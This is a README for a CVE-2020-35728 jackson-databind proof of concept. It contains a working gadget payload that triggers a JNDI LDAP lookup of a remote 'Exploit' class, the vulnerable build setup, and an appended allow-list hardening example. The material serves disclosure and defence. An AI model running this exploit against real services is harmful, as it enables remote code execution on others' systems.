CVE-2020-35728 & Jackson-databind RCE
https://github.com/Al1ex/CVE-2020-35728


### Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).

### How to RCE
pom.xml
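```
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.jacksonTest</groupId>
    <artifactId>jacksonTest</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <dependency>
            <groupId>com.fasterxml.jackson.core</groupId>
            <artifactId>jackson-databind</artifactId>
            <version>2.9.10.7</version>
        </dependency>
        <dependency>
            <groupId>org.glassfish.web</groupId>
            <artifactId>jakarta.servlet.jsp.jstl</artifactId>
            <version>2.0.0</version>
        </dependency>
        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.2</version>
        </dependency>
        <dependency>
            <groupId>javax.transaction</groupId>
            <artifactId>jta</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>
</project>
```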
poc.java
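~~~
import com.fasterxml.jackson.databind.ObjectMapper;

public class POC {
    public static void main(String[] args) throws Exception {
        // Wrapper-array form: ["<class name>", {properties}]; the class name comes from the input.
        String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1088/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        // Unrestricted default typing: the type id in the JSON selects the class to instantiate.
        mapper.enableDefaultTyping();
        Object obj = mapper.readValue(payload, Object.class);
        // Serialization calls the bean's getters; the PoC relies on this step to reach the JNDI lookup of jndiPath.
        mapper.writeValueAsString(obj);
    }
}
~~~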
result

![result](image/result.jpg)
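
The hardened counterpart of poc.java, as an added example that is not part of the original README: default typing restricted by an allow-list, fed the same gadget type id. It assumes jackson-databind 2.10 or later (where `activateDefaultTyping` and `BasicPolymorphicTypeValidator` are available); `SafeTypingDemo`, `Order`, `hardenedMapper` and `isRejected` are hypothetical names, and the `jndiPath` value is a constructed placeholder.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class SafeTypingDemo {
    // Hypothetical application DTO: the only type the allow-list accepts.
    public static class Order {
        public int id;
    }

    // Default typing restricted to an explicit allow-list, in place of the
    // unrestricted enableDefaultTyping() call used in poc.java.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Order.class)
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    // Returns true when the mapper refuses the type id carried in the JSON.
    static boolean isRejected(ObjectMapper mapper, String json) throws Exception {
        try {
            mapper.readValue(json, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = hardenedMapper();

        // Same type id as the README payload; jndiPath is a constructed placeholder.
        String gadget = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\","
                + "{\"jndiPath\":\"ldap://placeholder.invalid/x\"}]";
        System.out.println("gadget type rejected: " + isRejected(mapper, gadget));

        // An allow-listed type still round-trips with its type id attached.
        Order order = new Order();
        order.id = 7;
        String json = mapper.writeValueAsString(order);
        System.out.println("allow-listed type rejected: " + isRejected(mapper, json));
    }
}
```

The validator refuses the gadget's type id during type resolution, before any bean is constructed, so the getter-driven step in poc.java is never reached.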